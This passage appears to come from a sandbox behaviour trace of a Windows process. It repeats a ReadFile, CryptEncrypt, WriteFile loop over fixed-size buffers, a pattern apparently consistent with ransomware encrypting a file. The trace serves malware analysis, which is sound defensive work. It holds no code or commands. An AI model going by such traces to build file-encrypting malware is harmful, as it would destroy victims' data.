lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.415] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.415] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.415] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.415] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.415] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.415] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.415] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.415] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.415] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.415] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.415] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.415] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.415] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.415] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.415] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.416] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.416] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.416] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.416] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.416] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.416] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.416] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.416] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.416] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.416] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.416] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.416] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.416] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.416] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.416] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.416] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.416] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.416] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.417] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.417] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.417] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.417] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.417] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.417] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.417] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.417] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.417] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.417] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.417] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.417] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.417] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.417] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.417] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.417] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.418] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.418] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.418] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.418] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.418] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.418] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.418] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.418] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.418] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.418] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.418] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.418] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.419] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.419] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.419] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.419] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.419] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.419] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.419] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.419] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.419] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.419] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.419] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.419] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.419] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.419] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.419] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.419] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.420] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.420] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.420] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.420] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.420] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.420] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.420] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.420] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.420] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.420] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.420] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.420] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.420] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.420] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.420] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.420] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.421] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.421] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.421] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.421] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.421] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.421] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.421] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.421] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.421] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.421] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 